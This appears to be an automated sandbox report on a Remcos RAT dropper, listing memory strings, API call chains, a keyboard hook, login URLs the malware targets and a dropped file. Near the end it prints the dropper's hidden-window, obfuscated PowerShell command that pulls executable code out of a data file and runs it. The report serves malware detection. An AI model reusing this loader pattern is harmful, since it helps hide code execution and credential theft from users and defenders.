              Source: powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
              Source: powershell.exe, 00000007.00000002.216288846699.0000000004F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000007.00000002.216295020300.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
              Source: wab.exe, wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 0000000E.00000002.216328189876.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216849855991.000000000350D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217152613364.00000000034BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 00000012.00000002.216849181328.0000000002B7C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/
              Source: wab.exe, 00000016.00000002.217151981558.0000000002BCC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/Pn
              Source: wab.exe, 0000000E.00000002.216327420797.000000000309C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/Xr=
              Source: wab.exe, 0000000E.00000002.216328189876.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.216849855991.000000000350D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.217152613364.00000000034BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 0000000C.00000002.216343254639.00000000027E4000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.216862177214.0000000002A94000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 00000013.00000002.217168571301.0000000002B24000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000007.00000002.216288846699.0000000004F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000007.00000002.216295020300.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
              Source: wab.exe, 0000000C.00000002.216343644747.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.216862609126.0000000002E02000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000002.217168892924.0000000002E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: wab.exe, 0000000C.00000002.216343644747.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.216862609126.0000000002E02000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000002.217168892924.0000000002E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: wab.exe, 0000000C.00000003.216342776684.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.216343943505.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.216863019101.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.216861546047.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000003.217168034841.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000002.217169472479.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
              Source: wab.exe, 0000000F.00000002.216862609126.0000000002E02000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000002.217168892924.0000000002E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wab.exe, wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_004052FE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_004052FE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,12_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,13_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,14_2_004072B5

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216795183142.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216795183142.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216825365435.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216805263947.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8740, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              barindex
              Powershell drops PE file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\Uundgaaelige.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 6%
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00401806 NtdllDefWindowProc_W,12_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004018C0 NtdllDefWindowProc_W,12_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004016FD NtdllDefWindowProc_A,13_2_004016FD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004017B7 NtdllDefWindowProc_A,13_2_004017B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040330D
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_004067254_2_00406725
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_00404B3D4_2_00404B3D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D985787_2_04D98578
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D98E487_2_04D98E48
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D982307_2_04D98230
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_076FDB187_2_076FDB18
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044B04012_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0043610D12_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044731012_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044A49012_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040755A12_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0043C56012_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044B61012_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044D6C012_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004476F012_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044B87012_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044081D12_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0041495712_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004079EE12_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407AEB12_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044AA8012_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00412AA912_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00404B7412_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00404B0312_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044BBD812_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00404BE512_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00404C7612_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00415CFE12_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00416D7212_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00446D3012_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00446D8B12_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00406E8F12_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040503813_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041208C13_2_0041208C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004050A913_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040511A13_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043C13A13_2_0043C13A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004051AB13_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044930013_2_00449300
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040D32213_2_0040D322
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A4F013_2_0044A4F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043A5AB13_2_0043A5AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041363113_2_00413631
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044669013_2_00446690
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A73013_2_0044A730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004398D813_2_004398D8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004498E013_2_004498E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A88613_2_0044A886
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043DA0913_2_0043DA09
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00438D5E13_2_00438D5E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00449ED013_2_00449ED0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041FE8313_2_0041FE83
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00430F5413_2_00430F54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004050C214_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004014AB14_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040513314_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004051A414_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040124614_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040CA4614_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040523514_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004032C814_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040168914_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00402F6014_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8740 -s 1424
              Source: Uundgaaelige.exeStatic PE information: invalid certificate
              Source: Uundgaaelige.exeStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
              Source: Uundgaaelige.exe.7.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
              Source: Uundgaaelige.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@31/29@1/3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,12_2_004182CE
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040330D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,14_2_00410DE1
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_004045CA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_004045CA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,FindCloseChangeNotification,12_2_00413D4C
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_004020CB CoCreateInstance,MultiByteToWideChar,4_2_004020CB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,12_2_0040B58D
              Source: C:\Users\user\Desktop\Uundgaaelige.exeFile created: C:\Users\user\AppData\Roaming\raffineredesJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8580:304:WilStaging_02
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8740
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8580:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-P99HFC
              Source: C:\Users\user\Desktop\Uundgaaelige.exeFile created: C:\Users\user\AppData\Local\Temp\nsn1237.tmpJump to behavior
              Source: Uundgaaelige.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\Uundgaaelige.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: wab.exe, wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000011.00000002.216847912664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.217150396149.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 0000000C.00000003.216342309841.0000000004865000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.216344199265.0000000004865000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.216863381018.00000000049C8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000003.217167458196.0000000004BA5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000002.217169708585.0000000004BA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: Uundgaaelige.exeVirustotal: Detection: 13%
              Source: C:\Users\user\Desktop\Uundgaaelige.exeFile read: C:\Users\user\Desktop\Uundgaaelige.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-33248
              Source: unknownProcess created: C:\Users\user\Desktop\Uundgaaelige.exe "C:\Users\user\Desktop\Uundgaaelige.exe"
              Source: C:\Users\user\Desktop\Uundgaaelige.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
